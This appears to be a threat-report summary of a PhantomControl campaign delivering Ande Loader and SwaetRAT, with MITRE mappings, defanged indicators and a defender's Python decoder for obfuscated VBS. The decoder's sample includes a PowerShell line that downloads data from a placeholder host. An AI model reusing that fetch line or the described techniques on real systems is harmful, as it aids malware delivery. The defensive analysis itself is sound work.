PhantomControl returns with Ande Loader and SwaetRAT

eSentire’s TRU team details a PhantomControl campaign that chains phishing, a compromised website delivering a ScreenConnect dropper, and multi-stage payloads culminating in SwaetRAT with persistence and data-exfiltration capabilities. The report highlights abuse of legitimate tools, heavy obfuscation, process hollowing, and diverse C2 channels (DNS and HTTP) used by the actors. #PhantomControl #SwaetRAT

Key points

  • eSentire’s Threat Response Unit observed a PhantomControl incident in November 2023 with high confidence that phishing was the initial infection vector.
  • A compromised website delivered a malicious ScreenConnect client, leading to a connection to the actors’ ScreenConnect instance at legal-advocate.screenconnect[.]com and IP 147.75.81[.]214.
  • Approximately 9 minutes after launching ScreenConnect, a file named File_Vbs.vbs (MD5: 91570b30470e0375c62972a268fcaee7) was dropped under Documents\ConnectWiseControl\Temp.
  • The VBS script references paste[.]ee and, after cleanup, reveals a reversed base64-encoded PowerShell snippet that is decoded and executed.
  • Ande Loader, a .NET payload (MD5: 92fc4d4a1f6cad69ab11484e74815b50), is delivered from a base64 blob and is used to load a core RAT payload (SwaetRAT).
  • SwaetRAT is a 32-bit RAT with keylogging, system information collection, UAC checks, and a range of C2 commands, including remote screen capture and file operations.
  • The RAT uses process hollowing to inject into RegAsm.exe (T1055.012), employs startup persistence (T1547.001), and communicates via multiple channels (DNS and HTTP) to exfiltrate data and receive commands.

MITRE Techniques

  • [T1566.001] Phishing – Initial infection via phishing email. “In November 2023, eSentire’s Threat Response Unit observed an incident involving the PhantomControl threat actor(s). Based on the logs, we assess with high confidence that the initial infection vector was a phishing email.”
  • [T1189] Drive-by Compromise – Compromised website delivering a malicious ScreenConnect client. “The user was redirected to a malicious website serving ScreenConnect client from receipt-view.blogspot[.]com. Tracing the download source, we stumbled on a compromised website hosting a malicious ScreenConnect client.”
  • [T1219] Remote Access Tools – Use of ScreenConnect as a C2/RAS channel. “Upon running the ScreenConnect client, the infected machine established the connection to legal-advocate.screenconnect[.]com.”
  • [T1105] Ingress Tool Transfer – Downloading payload data from URLs. “The VBS script sets the URL of an image, creates a WebClient object, and downloads the data from the URL as a byte array.”
  • [T1071.001] Web Protocols – C2 communications over HTTP. “The VBS script sends an HTTP GET request to the URL, then it checks if the response status is 200.”
  • [T1027] Obfuscated/Compressed Files or Information – Obfuscated content in the VBS script and blob. “garbage strings that conceal the malicious code” and “garbled data and reversed strings.”
  • [T1059.005] VBScript – Execution of malicious code via VBScript. “The VBS script contains garbage strings that conceal the malicious code.”
  • [T1059.001] PowerShell – Deobfuscated PowerShell snippet loaded from base64 data. “reversed base64-encoded obfuscated PowerShell snippet”
  • [T1055.012] Process Hollowing – Core payload injected into RegAsm.exe. “the core payload gets injected into RegAsm.exe via process hollowing (T1055.012).”
  • [T1547.001] Startup Folders – Persistence via Startup shortcut. “creating a persistence via Startup (T1547.001) with the shortcut file named ‘LnkName’.”
  • [T1113] Screen Capture – Screenshot capture and exfiltration. “DeskDrop: Captures a screenshot and sends it back to the server in a base64-encoded and GZIP-compressed format.”
  • [T1082] System Information Discovery – The RAT’s Info method gathers host details. “Info method collects system information,” listing components such as user name, OS, architecture, antivirus, UAC status, and group.
  • [T1497] Virtualization/Sandbox Evasion – Anti-VM checks. “The AntiVM feature would check for processes that contain ‘vmtoolsd’ or ‘VBoxService.’”
  • [T1071.004] DNS – C2 via DNS. “SwaetRAT C2: dns-govv[.]ink”
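A defender-side triage helper for the obfuscation described in the key points and the T1059 entries above (a reversed, base64-encoded PowerShell snippet hidden among garbage string literals in the VBS dropper). This is an added example, not code from eSentire or the report; the VBS sample, the PowerShell snippet and the URL inside it are constructed placeholders, and the marker list is an assumption about what decoded PowerShell typically contains.

```python
import base64
import re

# Case-insensitive substrings that suggest a decoded blob is PowerShell (assumed list).
PS_MARKERS = ("new-object", "webclient", "downloaddata", "downloadstring",
              "invoke-expression", "iex ")
# VBScript string literals long enough to plausibly hold an encoded payload.
STRING_LITERAL = re.compile(r'"([^"\r\n]{40,})"')


def try_decode(literal):
    """Return (variant, text) if the literal decodes to PowerShell-like text, else None.

    Reversed-then-base64 (the trick described in the report) is tried before plain
    base64; UTF-8 and UTF-16-LE (the -EncodedCommand form) are both attempted.
    """
    for variant, candidate in (("reversed", literal[::-1]), ("plain", literal)):
        padded = candidate + "=" * (-len(candidate) % 4)  # restore stripped padding
        try:
            raw = base64.b64decode(padded, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        for encoding in ("utf-8", "utf-16-le"):
            try:
                text = raw.decode(encoding)
            except UnicodeDecodeError:
                continue
            if any(marker in text.lower() for marker in PS_MARKERS):
                return variant, text
    return None


def scan_vbs(source):
    """Return (variant, decoded_text) for every suspicious literal in a VBS file."""
    hits = []
    for match in STRING_LITERAL.finditer(source):
        result = try_decode(match.group(1))
        if result is not None:
            hits.append(result)
    return hits


# Constructed stand-in for the dropper: a decoy string plus a reversed,
# base64-encoded PowerShell snippet. The URL is a placeholder, not an IoC.
PS_SNIPPET = ("$u = 'https://example.invalid/vbs.jpg'; "
              "$wc = New-Object System.Net.WebClient; $b = $wc.DownloadData($u)")

def build_sample_vbs():
    blob = base64.b64encode(PS_SNIPPET.encode("utf-16-le")).decode()[::-1]
    return ('Dim junk, payload\njunk = "' + "x" * 60 + '"\n'
            'payload = "' + blob + '"\n')
```

Run `scan_vbs` over a suspicious .vbs read from disk; a hit returns the recovered PowerShell for analysis without executing anything.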

Indicators of Compromise

  • [Domain] receipt-view.blogspot[.]com – Redirector used to host initial malicious activity
  • [Domain] jewelrycleaningmachine[.]com – Compromised website hosting the malicious ScreenConnect client
  • [Domain] legal-advocate.screenconnect[.]com – Threat actor-controlled ScreenConnect instance
  • [IP Address] 147.75.81[.]214 – IP address the ScreenConnect instance resolved to
  • [MD5] 412e11d3ff7659c7d05194cc5e0e1f32 – ScreenConnect client binary
  • [MD5] 91570b30470e0375c62972a268fcaee7 – File_Vbs.vbs dropped on host
  • [MD5] 92fc4d4a1f6cad69ab11484e74815b50 – Ande Loader binary
  • [MD5] d6d29037517bb1d8202efbf39534df7a – SwaetRAT binary
  • [Domain] dns-govv[.]ink – SwaetRAT C2 domain
  • [URL] paste[.]ee/d/k7m1f/0 – Source of the base64 blob for the core payload
  • [URL] uploaddeimagens.com[.]br/images/004/666/676/original/vbs.jpg?1700182879 – Host for Ande Loader content
  • [Mutex] qVnqcuDNS5fGFGb – Mutex created to ensure single instance

Read more: https://www.esentire.com/blog/phantomcontrol-returns-with-ande-loader-and-swaetrat